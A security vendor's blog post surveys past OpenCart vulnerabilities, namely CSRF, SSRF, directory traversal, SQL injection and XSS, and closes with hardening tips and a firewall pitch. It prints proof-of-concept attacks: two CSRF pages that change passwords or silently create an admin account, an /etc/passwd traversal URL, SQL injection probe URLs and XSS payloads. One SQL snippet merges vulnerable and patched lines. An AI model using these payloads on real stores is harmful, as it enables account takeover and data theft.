OpenCart Security Issues - Top Attacks on OpenCart

OpenCart is a user-friendly, dynamic PHP-based open source online store management system. Being economical and open source, it is a boon for e-commerce startups. According to BuiltWith, 442,897 websites are currently using OpenCart for e-commerce activities. With fame, OpenCart has also gained the attention of hackers & cybercriminals. This article is all about OpenCart security Issues that opencart faces currently. And we will discuss solutions to mitigate these security risks.

Attackers have exploited OpenCart frequently. Consequently, OpenCart security has become one of the most discussed topics among professionals who are assigned to secure these platform from attackers. Let us study some of the common OpenCart security Issues, get to know about their tell-tale signs and then discuss some of the preventive measures.

Related article – 4 Step Approach to OpenCart Security

1. OpenCart Security Issues: Cross-Site Request Forgery

In 2010 and 2018, OpenCart version 1.4 and 3.0.2.0 were found to have a Cross-Site Request Forgery vulnerability which is one of the severe OpenCart Security issues. In OpenCart version 3.0.2.0, the /upload/catalog/controller/account/password.php can be accessed via cross-site request forgery attack. The attacker needs to access the index.php in the following manner: index.php?route=account/password and s/he will be directed to the passwords folder. When they get access to this folder, they can change a user’s password. A sample code for this OpenCart Security issue is:

<html>
<body>

<form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="CK01ck01" />
<input type="hidden" name="confirm" value="CK01ck01" />
<script>    document.getElementById('post123').submit(); </script>
</form>


</body>
</html>

In OpenCart version 1.4 (2010), due to CSRF vulnerability in index.php, remote attackers could hijack the authentication of an application’s administrative privileges. By setting the POST request’s route parameter to “user/user/insert”, the attacker could request for an administrative account session. For better understanding, a sample script is attached which performs CSRF by exploiting the POST request.

<html>

<head>

<title>OpenCart CSRF Vulnerability</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<script type="text/javascript">

function csrfInjection()

{

var params = {

'username' : 'an_attacker',

'firstname' : 'attack',

'lastname' : 'user',

'email' : 'some.user (at) randomatackerdomain (dot) com [email concealed]',

'user_group_id' : '1', //Default group id for administrator level is 1

'password' : 'test',

'confirm' : 'test',

'status' : '1'

};

var form = document.createElement("form");

form.setAttribute("method", "post");

form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

for(var key in params)

{

var hiddenField = document.createElement("input");

hiddenField.setAttribute("type", "hidden");

hiddenField.setAttribute("name", key);

hiddenField.setAttribute("value", params[key]);

form.appendChild(hiddenField);

}

attack_result.document.body.appendChild(form);

form.submit();

}

</script>

</head>

<body>

OpenCart CSRF Vulnerability

<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />

<a href="#" onclick="csrfInjection();return false;">Add User</a>

<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>

<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

</body>

</html>

Related article – Inside-out guide to OpenCart Security

2. OpenCart Security Issues: Server Side Request Forgery

In a different version to the series of CSRF attacks, a Server Side Request Forgery was also reported in 2014 in OpenCart 1.5.6.4. This OpenCart Security issue was found in Cart::getProducts method in the PHP scripts located in system/library/cart.php. A sample vulnerable code snippet from the getProducts function of Cart class is as follows:

foreach ($this->session->data['cart'] as $key => $quantity)

{

$product = explode(':', $key);

$product_id = $product[0];

$stock = true;

// Options

if (!empty($product[1]))

{

$options = unserialize(base64_decode($product[1]));

}

else

{

$options = array();

}

In this code snippet, the unserialize method is being used to process the key values of the array stored into the “data[‘cart’]” session variable without proper input validation. Such values can be manipulated by an unauthenticated attacker via the $_POST[‘quantity’] parameter during an “update” request. This OpenCart Security issue can be used to inject arbitrary PHP objects into the application scope and thus allow an attacker to conduct Server-Side Request Forgery (SSRF) attacks.

Is your OpenCart store hacked? Drop us a message or chat with us now, and we will be happy to help 😊

3. OpenCart Security Issues: Directory Traversal

In 2009, OpenCart v1.1.8 was reported as having a directory traversal vulnerability in its index.php file. This enabled a remote attacker to access files and folders available in the website directory. The remote attacker used .. (dot dot) in the route parameter and got access to the OpenCart website. A sample of the exploit for this vulnerability is as follows:

http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00

In 2018, OpenCart 3.0.2.0 was reported of a security issue pertaining to directory traversal. In this version, there is a feature called “program extension upload”. It comprises of the following steps:

  1. Upload
  2. Install
  3. Unzip
  4. Move
  5. Xml
  6. Remove

Now, if the “Remove” step is skipped, arbitrary code can be executed. This happens because the attacker can now discover a secret temporary directory name (containing 10 random digits) through a directory traversal attack involving language_info[‘code’].

In the same version, there is another directory traversal vulnerability in the editDownload function in adminmodelcatalogdownload.php via admin/index.php?route=catalog/download/edit. As a consequence, the configuration file of your OpenCart website may be downloaded by the attacker and they may tamper with it to cause disruption to your online business.

4. OpenCart Security Issues: SQL Injection

One of the most common attacks that PHP-based websites face is SQL Injection. There are four OpenCart Security issues that are based on SQL injection. The first one was reported in 2009 in OpenCart v1.1.8 which allowed remote attackers to execute arbitrary SQL commands via the order parameter. It was a case of Blind SQL injection and popped up when the order parameter was not sanitized before use. In this attack, the attacker could craft statements containing ORDER parameter in SQL and view, add, modify or delete information in the back-end database of OpenCart. The information that could be revealed to an attacker included usernames, unsalted MD5 passwords, payment gateway credentials, etc.

Then in 2010, OpenCart v1.3.2 was again reported as having an SQL injection vulnerability. The page parameter of SQL could be exploited via the index.php page of the OpenCart website. Given below are some of the example URIs which were specially crafted to demonstrate this OpenCart Security issue:

http://www.example1.org/index.php?route=product%2Fspecial&amp;path=20&amp;page='

http://www.example2.in/index.php?route=product%2Fspecial&amp;path=20&amp;page='

http://www.example3.com/index.php?route=product%2Fcategory&amp;path=20&amp;page=andres'"

In version 2.3.0.0 of OpenCart which were using Amazon Order Tracking function, there was an SQL Injection vulnerability that was detected in upload/admin/model/openbay/amazon.php. This OpenCart security issue enabled remote authenticated administrators to execute arbitrary SQL commands via courier_id parameter to openbay.php. A code snippet of updateAmazonOrderTracking function which takes in courier_id as a parameter is shown as follows:

public function updateAmazonOrderTracking($order_id, $courier_id, $courier_from_list, $tracking_no)

{

$this->db->query(“UPDATE `”.DB_PREFIX.”amazon_order`

SET `courier_id` = ‘“.$courier_id.”’,

SET `courier_id` = ‘“.$this->db->escape($courier_id).”’,

`courier_other` = “.(int)!$courier_from_list.”,

`tracking_no` = ’”.$tracking_no.”’

`tracking_no` = ‘“.$this->db->escape($tracking_no).”’

WHERE `order_id` = “.(int)$order_id.””);

}

Thus, through this OpenCart Security vulnerability, an SQL injection could be performed and order details of another customer could be accessible to an attacker.

Related article – How to prevent SQL Injection (SQLi) in Opencart 1.5.x/2.x/3.x

5. OpenCart Security Issues: Cross-Site Scripting

The first XSS OpenCart Security issue was discovered in 2008 in OpenCart v0.7.7. There were multiple cross-site scripting (XSS) vulnerabilities reported in index.php. This enabled attackers to insert malicious web scripts or HTML through parameters firstname and search. This OpenCart Security issue was the aftermath of improper validation of user-supplied input by the index.php script. The remote attacker could exploit this vulnerability using firstname and search parameter in a specially-crafted URL. The script would then get executed in a victim’s web browser. The attack initiates when the URL is clicked. An attacker can steal the victim’s cookie-based authentication credentials.

In 2015, a similar XSS OpenCart Security issue was reported in versions of OpenCart before v2.1.0.2. The vulnerability exploited the zone_id parameter to inject arbitrary HTML script to index.php. A sample exploit code that demonstrates this vulnerability is as follows:

/opencart/index.php?route=account/address/add(zone_id - POST)

Through this vulnerability, an attacker could hijack a user’s session, change the logged in user’s password and invalidate the victim user’s session. Now, if you as an administrator are logged in to your OpenCart website, then imagine what a nightmarish experience it would be. The attacker will have full administrative privileges on your website.

In 2018, in OpenCart’s Overclocked version less than 1.11.1, there was a Cross-Site Scripting (XSS) vulnerability in user input. The input was not sanitized within the JS function. This could cause unauthorized actions and access to data, stealing of session information, denial of service, The attack exploit was found in the malicious input passed in GET parameter. A sample exploit code can be:

var token = “<?php echo $_GET[‘token’]; alert(1)?>”;

Related article – How to Prevent Cross-site Scripting (XSS) in Opencart 1.5.x, 2.x & 3.x

Conclusion: Combating OpenCart Security Issues

In all of these attacks, the vulnerability was being caused due to coding which did not pay heed to data security. Hence, the following are some of the security measures that you should not ignore:

  • The website administrator should make a thorough check of the various areas of code that deals with user input.
  • They must ensure that whatever data is associated with the website is properly sanitized with functions and logic.
  • Data must be properly validated before passing them to back-end servers.
  • The default account credentials should be changed.
  • The plugins, themes & templates that are being used by the website must be updated.

If you are finding it difficult to keep up with so many steps, then you can take professional help. For instance, Astra’s Web Application Firewall is a great way to mitigate all these OpenCart security issues. Astra firewall is known to block CSRF, XSS, SQLi, OWASP top 10, bad bots and 100+ other coming threats. It also keeps a real-time check and fortifies your OpenCart from different security issues and malicious attackers. Click here to get an Astra demo now!

Astra Firewall

For more articles on OpenCart security, you can visit this section of Astra blog and get some quality tips for your OpenCart website.

Was this post helpful?

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Naman Rastogi

Naman is a Digital Marketer & Growth Hacker at Astra. A technology enthusiast with focused interest in website security.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close